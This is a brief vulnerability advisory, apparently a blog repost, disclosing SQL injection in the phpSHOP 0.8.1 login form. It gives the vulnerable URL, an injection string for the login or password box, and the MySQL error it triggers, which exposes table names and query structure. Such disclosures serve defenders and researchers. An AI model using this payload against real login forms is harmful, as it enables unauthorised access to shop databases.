phpSHOP 0.8.1 SQL Injection Vulnerability


phpSHOP 0.8.1 SQL Injection
author: y2h4ck
e-mail: y2h4ck[ at ]
Vuln script: http://shop/0.8.1/?login=1&&
String: /?login=‘1==1’ select —
In the login/password input box you can pass some SQL Injection strings to manipulate
the behavior of the mysql Queries to the phpSHOP
Database error: Invalid SQL: SELECT * from auth_user_md5,user_info WHERE auth_user_md5.username =”1==1′ select –‘ AND auth_user_md5.password =’d41d8cd98f00b204e9800998ecf8427e’AND auth_user_md5.password =’d41d8cd98f00b204e9800998ecf8427e’AND auth_user_md5.user_id = user_info.user_id AND user_info.address_type = ‘BT’

MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘1==1’ select –‘ AND auth_user_md5.password =’d41d8cd98f00b204e9800998ecf8427e’A’ at line 1)


Version: 0.8.1
Vendor :

Date: 14/02/2008



Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s